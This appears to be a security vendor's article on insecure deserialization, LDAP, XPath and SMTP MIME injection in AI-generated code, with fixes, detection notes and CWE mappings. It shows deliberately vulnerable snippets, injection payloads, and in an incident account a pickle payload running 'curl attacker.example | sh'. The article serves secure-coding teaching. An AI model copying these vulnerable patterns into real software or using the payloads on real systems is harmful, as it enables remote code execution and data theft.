INSECURE DESERIALIZATION AND LONG-TAIL INJECTIONS

SQL injection gets all the press. The other injection classes are still alive and well in AI-generated code, and the model frequently picks the unsafe primitive because the safe one is more verbose.

The scenarios referenced below run on gapbench.vibe-eval.com, a public security benchmark we operate.

The injection family beyond SQL

SQL injection has a brand. People know about it. Frameworks default to parameterized queries. Most AI-generated SQL is, accidentally, safe — because Prisma, Drizzle, and the modern ORMs make the safe path the default.

The injection family beyond SQL is less famous and less defaulted-safe. Pickle, LDAP, XPath, MIME, NoSQL, template engines (SSTI). Each has its own gotcha. AI generators reproduce them because the safe pattern requires knowing about the unsafe pattern, and the unsafe pattern is shorter.

I’ll cover four; gapbench has more.

Insecure deserialization

import pickle

@app.route('/restore', methods=['POST'])
def restore():
    data = pickle.loads(request.data)
    return jsonify(restored=str(data))

pickle.loads will execute arbitrary code from a crafted byte string. Payload generators exist (ysoserial for Java is the best known), and for Python a working payload is a few lines built around __reduce__. Send the payload, code runs.

The fix: don’t use pickle for untrusted input. Use JSON. If you specifically need pickle for performance reasons, sign the payload (HMAC) and verify before deserializing — and even then, prefer not to.

Same shape applies to:

  • Java ObjectInputStream — use Jackson or similar with explicit type allow-lists.
  • PHP unserialize — avoid for untrusted input; use json_decode.
  • Ruby Marshal.load — avoid; use JSON.
  • .NET BinaryFormatter — Microsoft has explicitly deprecated this for the same reason.
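
If pickle really cannot be avoided, the sign-then-verify step mentioned above could look like the following minimal sketch. SECRET_KEY, sign_blob, and load_signed are hypothetical names, and the sketch assumes the key lives only on the server. A valid signature proves only that your own service produced the bytes; it does not make a pickle that embeds user-controlled objects safe.

```python
import hashlib
import hmac
import pickle

# Assumption: a server-side secret loaded from configuration, never sent to clients.
SECRET_KEY = b"replace-with-a-random-32-byte-key"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def sign_blob(obj) -> bytes:
    """Pickle obj and prepend an HMAC-SHA256 tag over the pickled bytes."""
    data = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return tag + data


def load_signed(blob: bytes):
    """Verify the tag first; only unpickle bytes this service signed."""
    tag, data = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    # compare_digest avoids leaking how many leading bytes matched.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch; refusing to unpickle")
    return pickle.loads(data)
```

The important property is ordering: pickle.loads is never reached for bytes that fail verification.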

Live: https://gapbench.vibe-eval.com/site/insecure-deser/.

LDAP filter injection

filter = f"(uid={username})"
results = ldap_client.search(base_dn, ldap.SCOPE_SUBTREE, filter)

Username = *)(uid=*. The filter becomes (uid=*)(uid=*): the payload closes the first clause itself, and the trailing ) from the format string closes the second. Depending on the LDAP server, this may match all users. With more creative payloads, such as *)(|(password=*), the attacker can probe attributes.

Fix: escape LDAP special characters ((, ), *, \, NUL) in user input before interpolating, or use a parameterized API if your LDAP library has one.

Live: https://gapbench.vibe-eval.com/site/ldap-injection/.

XPath tautology

const query = `//users/user[username='${input}' and password='${pass}']`
const result = xmlDoc.evaluate(query, ...)

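Set both username and password to ' or '1'='1. The query becomes //users/user[username='' or '1'='1' and password='' or '1'='1']. In XPath, and binds tighter than or, so the trailing or '1'='1' makes the predicate true for every user node, and code that takes the first result authenticates as the first user. Injecting only the username is not enough, because the and password='' clause still has to hold. With more creativity, the attacker reads arbitrary XML content.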

Fix: bind user input as XPath variables where the API supports it (for example an XPathVariableResolver in Java’s javax.xml.xpath, or keyword variables in lxml), or escape user input. Don’t concatenate.
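
For the escaping route there is a wrinkle: XPath 1.0 string literals have no escape character, so a value containing both quote types has to be assembled with concat(). A minimal sketch of that workaround follows; xpath_literal and login_query are hypothetical helper names, and the element names are taken from the example above.

```python
def xpath_literal(value: str) -> str:
    """Return value as an XPath 1.0 string literal."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    # Both quote types present: split on single quotes and rejoin the pieces
    # through concat(), writing each single quote as the literal "'".
    pieces = [f"'{part}'" for part in value.split("'")]
    return "concat(" + ", \"'\", ".join(pieces) + ")"


def login_query(username: str, password: str) -> str:
    """Build the lookup with both inputs confined to string literals."""
    return (
        "//users/user[username=" + xpath_literal(username)
        + " and password=" + xpath_literal(password) + "]"
    )
```

With this in place, the tautology payload stays inside a double-quoted literal and is compared as plain text instead of changing the predicate.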

Live: https://gapbench.vibe-eval.com/site/xpath-injection/.

SMTP MIME injection

def send_email(to, subject, body):
    msg = f"To: {to}\r\nSubject: {subject}\r\nFrom: noreply@example.com\r\n\r\n{body}"
    smtp.sendmail(...)

To = victim@example.com\r\nBcc: attacker@example.com. The attacker is now BCC’d on every email this code sends with that To value. Or the attacker can inject Subject: Free iPad\r\n\r\nClick here to claim, which replaces the subject and starts the body early, and so send their own emails through your service.

Fix: use a proper email library (email.message.EmailMessage in Python’s standard library, nodemailer, etc.) that handles MIME structure correctly. Validate that user-supplied addresses don’t contain \r or \n.
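
A minimal sketch of that fix using only the Python standard library. build_message is a hypothetical helper, and the sender address is the one from the example above. The explicit line-break check runs before any header is set, so the rejection does not depend on library behavior.

```python
from email.message import EmailMessage


def build_message(to: str, subject: str, body: str) -> EmailMessage:
    """Build a message, refusing header values that contain CR or LF."""
    for name, value in (("To", to), ("Subject", subject)):
        if "\r" in value or "\n" in value:
            raise ValueError(f"{name} header contains a line break")
    msg = EmailMessage()
    msg["From"] = "noreply@example.com"
    msg["To"] = to
    msg["Subject"] = subject
    msg.set_content(body)  # the library writes the header/body separator
    return msg
```

The resulting object can be handed to smtplib.SMTP.send_message, which keeps the headers and body structured instead of passing one hand-built string.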

Live: https://gapbench.vibe-eval.com/site/email-mime-injection/.

Bonus mentions

For completeness, these have their own scenarios:

  • SQL injection at /site/sqli-raw/. Yes, AI still produces raw SQL with string concatenation, especially in code that mixes ORM calls with “just one quick raw query.”
  • NoSQL injection at /site/nosql-injection/. Mongo’s $where and operator-based query injection — { username: { $ne: null } } to bypass auth.
  • Server-Side Template Injection at /site/ssti/. Concatenating user input into a Jinja2/Handlebars/etc. template that the engine evaluates.

The shape is the same across all of them: build a query/template/filter from user input without escaping or parameterization, and the user gets to control the structure. The fix is the same: parameterize.
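
For the NoSQL case, the structural control comes from operator objects such as { $ne: null } arriving where a string was expected. A minimal sketch of keeping the filter shape fixed, assuming a Mongo-style query dict; require_str and build_user_filter are hypothetical names and no driver call is shown.

```python
def require_str(payload: dict, field: str) -> str:
    """Return payload[field] only if it is a plain string."""
    value = payload.get(field)
    if not isinstance(value, str):
        raise TypeError(f"{field} must be a string, got {type(value).__name__}")
    return value


def build_user_filter(payload: dict) -> dict:
    # The filter's structure is decided here; the request supplies a scalar only.
    return {"username": require_str(payload, "username")}
```

A request body of {"username": {"$ne": None}} now fails the type check instead of reaching the database as an operator.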

A specific incident — pickle to RCE

Anonymized. A Python data-science SaaS had a feature where users could “save and share their workspace state.” Workspace state was a complex object graph — pandas DataFrames, scikit-learn models, custom transformer classes. The team’s serialization choice: pickle, because it round-trips arbitrary Python objects and JSON wouldn’t.

The save endpoint pickled the workspace state and stored it in S3. The load endpoint pulled the bytes and unpickled. Both endpoints were authenticated.

The bug was that “shared” workspaces — a feature added later — let one user load another user’s pickle. The receiving user didn’t know whose pickle they were loading. An attacker registered, pickled a workspace state containing __reduce__ magic that runs os.system('curl attacker.example | sh') on unpickle, shared it with target users, and waited for them to click the share link.

Three users clicked. Three RCEs. The malicious pickle ran inside the SaaS’s worker, which had access to the S3 bucket and to a few internal services. The attacker pivoted from worker access to S3-write to the team’s container registry, pushed a malicious image, and waited for the next deploy.

The cleanup was extensive. Disable pickle entirely; migrate workspace serialization to a custom JSON-based format that explicitly lists allowed types. Audit S3 for malicious files. Re-deploy from a known-good registry image. Rotate every credential the worker had touched.
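
The team's actual format is not described here, but the idea of a JSON format with an explicit type allow-list can be sketched as follows. ALLOWED_DECODERS, load_workspace, and the "point" and "label" types are all hypothetical and exist only for illustration.

```python
import json

# Assumption: every allowed type has an explicit decoder; anything else is rejected.
ALLOWED_DECODERS = {
    "point": lambda d: (float(d["x"]), float(d["y"])),
    "label": lambda d: str(d["text"]),
}


def load_workspace(raw: str) -> list:
    """Decode a JSON array of tagged items, refusing unknown type tags."""
    items = json.loads(raw)
    if not isinstance(items, list):
        raise ValueError("workspace must be a JSON array")
    result = []
    for item in items:
        kind = item.get("type") if isinstance(item, dict) else None
        if not isinstance(kind, str) or kind not in ALLOWED_DECODERS:
            raise ValueError(f"type {kind!r} is not on the allow-list")
        result.append(ALLOWED_DECODERS[kind](item))
    return result
```

The type tag only selects from code the service already ships; unlike a pickle, the data cannot name a new callable.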

The lesson, and it is the lesson for every variant of insecure deserialization: pickle (and Java ObjectInputStream, and PHP unserialize, and Ruby Marshal) is RCE-by-design when used on untrusted input. It’s not a “this could be exploited” — it’s a “this is how the format is intended to work.” If you have user input flowing into pickle.loads, you have RCE. The fix is “don’t use pickle for user input.”
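
A harmless illustration of why this is the format working as intended: a pickle can name any importable callable plus its arguments, and the unpickler calls it. The class name Innocent is made up for this sketch, and the callable is the built-in int; an attacker would put a different callable in the same slot.

```python
import pickle


class Innocent:
    # __reduce__ tells pickle how to rebuild the object: "call this callable
    # with these arguments". The callable here is the harmless built-in int.
    def __reduce__(self):
        return (int, ("42",))


payload = pickle.dumps(Innocent())

# Unpickling calls int("42"); no Innocent instance is ever reconstructed.
result = pickle.loads(payload)
```

Nothing in the payload is malformed, which is why input validation on the bytes does not help.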

What “untrusted” means in this context

Untrusted = anyone who is not the same trust principal as the code reading the data. In practice:

  • Data from a different user, even an authenticated one — untrusted relative to the receiving user
  • Data from your own database — untrusted if the database’s contents are influenced by user actions
  • Data from an external API — untrusted relative to your service
  • Data from cache — only as trusted as whoever can write to the cache
  • Data from a file — only as trusted as the file’s source

The general rule: deserialize untrusted input only with formats that don’t allow code execution. JSON, MessagePack, Protobuf, Avro, CBOR are safe. Pickle, ObjectInputStream, unserialize, Marshal, BinaryFormatter, YAML (with some loaders) are not.

An LDAP injection deep-dive

LDAP injection is less common than SQL injection but more catastrophic when it lands, because LDAP is often the auth backend for the entire org.

# WRONG: f-string interpolation
filter = f"(uid={username})"
# username = "*)(uid=*"
# filter   = "(uid=*)(uid=*)"
# Depending on the LDAP server, this may match every user

# WRONG: incomplete escaping
def escape(s):
    return s.replace('(', '\\28').replace(')', '\\29')
# Misses: *, the backslash itself, and the NUL byte

# RIGHT: full LDAP escape per RFC 4515
def ldap_escape(s):
    table = str.maketrans({
        '\\': r'\5c',
        '*': r'\2a',
        '(': r'\28',
        ')': r'\29',
        '\x00': r'\00',
    })
    return s.translate(table)

filter = f"(uid={ldap_escape(username)})"

# BETTER: use the escaping helpers your library ships
# python-ldap: ldap.filter.escape_filter_chars and ldap.filter.filter_format
# ldap3: ldap3.utils.conv.escape_filter_chars
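
To show what filter substitution buys you without depending on a particular library, here is a standard-library sketch in the spirit of python-ldap's ldap.filter.filter_format. build_filter is a hypothetical name, and the sketch assumes the template contains no % characters other than its %s placeholders.

```python
# Escape table for the characters RFC 4515 requires escaping in filter values.
_ESCAPES = str.maketrans({
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
})


def build_filter(template: str, *values: str) -> str:
    """Fill each %s in template with an escaped value.

    The template is written by the developer; only values come from users.
    """
    return template % tuple(v.translate(_ESCAPES) for v in values)
```

Calling build_filter("(uid=%s)", username) keeps the escaping next to the template, so a call site cannot forget it.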

XPath, LDAP, and email MIME — common shape

All three injection classes share a structure: the application builds a query/filter/header from user input via string concatenation, and special characters in the input change the query’s meaning. The defense is identical in shape — escape per the format’s spec, or use a parameterized API.

The bugs persist because:

  1. The “escape function” is rarely in the standard library and is finicky to write correctly.
  2. Parameterized APIs exist but require more setup than string concatenation.
  3. AI codegen reaches for the shorter pattern, which is the unsafe one.

Cross-stack notes

The same general advice (use a safe deserializer; use parameterized queries; sanitize injection inputs) applies across stacks. The libraries that make the right pattern easy:

  • Python: defusedxml for XML; the standard json module is safe as-is; PyYAML with yaml.safe_load (not yaml.load); avoid pickle for untrusted input.
  • Java: Jackson with polymorphic default typing left off; if polymorphic deserialization is required, use activateDefaultTyping with a PolymorphicTypeValidator that allow-lists explicit types. Avoid ObjectInputStream.
  • Ruby: JSON.parse is safe. YAML.safe_load exists and should be used instead of YAML.load.
  • PHP: json_decode is safe. unserialize should not see untrusted input.
  • .NET: Newtonsoft.Json is safe with its default TypeNameHandling.None; other TypeNameHandling values reintroduce the problem. BinaryFormatter is deprecated by Microsoft for security reasons.

How we detect

For each injection family we have a payload set:

  • Deser: probe with format-specific exploit payloads (pickle, Java) and observe whether code execution markers appear server-side.
  • LDAP: probe with *)(uid=* and similar payloads, observe whether response data widens unexpectedly.
  • XPath: probe with ' or '1'='1 payloads against query endpoints, observe whether responses include unexpected data.
  • MIME: probe with CRLF-in-address payloads, observe whether emails get sent to unexpected destinations.

All runtime. The static scanner story is partial — it can flag the unsafe library calls (pickle.loads, raw f-string LDAP filters, etc.) but can’t confirm exploitability without the request.
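
To make the static half concrete, here is a minimal sketch of flagging direct pickle.load and pickle.loads calls with Python's ast module. It is an illustration, not how our scanner is implemented; UNSAFE_CALLS and find_unsafe_calls are hypothetical names, and the sketch deliberately ignores aliased imports such as from pickle import loads.

```python
import ast

# Assumption: a tiny, illustrative deny-list of (module, function) pairs.
UNSAFE_CALLS = {("pickle", "loads"), ("pickle", "load")}


def find_unsafe_calls(source: str) -> list:
    """Return sorted (line, 'module.func') pairs for deny-listed direct calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Match only the module.func(...) shape, e.g. pickle.loads(data).
        if (isinstance(func, ast.Attribute)
                and isinstance(func.value, ast.Name)
                and (func.value.id, func.attr) in UNSAFE_CALLS):
            findings.append((node.lineno, f"{func.value.id}.{func.attr}"))
    return sorted(findings)
```

A finding says only that the call exists; whether request data can reach it is the part that needs the runtime probe.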

CWE / OWASP

  • CWE-502 — Deserialization of Untrusted Data
  • CWE-90 — Improper Neutralization of Special Elements used in an LDAP Query
  • CWE-643 — Improper Neutralization of Data within XPath Expressions
  • CWE-93 — Improper Neutralization of CRLF Sequences (MIME)
  • OWASP Top 10 — A03:2021 Injection, A08:2021 Software and Data Integrity Failures


COMMON QUESTIONS

01
What is insecure deserialization?
Some serialization formats (Python's pickle, Java's ObjectInputStream, PHP's unserialize, Ruby's Marshal) can encode arbitrary objects whose reconstruction runs code during deserialization. If your app deserializes untrusted input with these formats, an attacker can craft a payload that triggers code execution. JSON and most binary formats (Protobuf, Avro) are safe by design; the dangerous ones are the ones that allow class instantiation from the data.
02
What is LDAP filter injection?
If your app builds an LDAP filter from user input (typically for a username lookup) and concatenates the input into the filter string, an attacker can break out of the intended filter. A username of *)(uid=* can match every user in the directory. The fix is to escape LDAP special characters in user input, or to use a parameterized LDAP query API.
03
What is XPath tautology?
Same shape as SQL injection but in XPath. App builds an XPath expression with user input concatenated. Attacker submits 'admin' or '1'='1' style payloads that turn the expression into a tautology, bypassing the filter. Common in apps that store auth or config in XML and query it with XPath.
04
What is SMTP MIME injection?
Your app sends emails. The To, Subject, or Reply-To header is built from user input. If the input contains carriage-return-line-feed sequences, the user can inject additional headers — Bcc, additional To, even add MIME boundaries that change the email body. Used to send spam through your service, or to steal email contents by adding a Bcc to the attacker.
05
Why do AI generators still produce these?
Because each one's safe pattern is verbose and the unsafe pattern is short. Calling pickle.loads(data) is one line; the safe equivalent is several. Building an LDAP filter with f-strings is one line; using a parameterized API is more setup. The AI picks the short pattern by default. The bug is invisible until exploited.
06
Where can I see this on a real URL?
https://gapbench.vibe-eval.com/site/insecure-deser/, https://gapbench.vibe-eval.com/site/ldap-injection/, https://gapbench.vibe-eval.com/site/xpath-injection/, https://gapbench.vibe-eval.com/site/email-mime-injection/. SQL injection, NoSQL injection, and SSTI also exist as their own scenarios at /site/sqli-raw/, /site/nosql-injection/, /site/ssti/.
07
What CWE does this map to?
CWE-502 (Deserialization of Untrusted Data), CWE-90 (LDAP Injection), CWE-643 (XPath Injection), CWE-93 (CRLF Injection for MIME). OWASP A03:2021 (Injection), A08:2021 (Software and Data Integrity Failures).

PROBE THE LONG-TAIL INJECTIONS

We send the deserialization, LDAP, XPath, and MIME payloads that catch the unsafe variants.
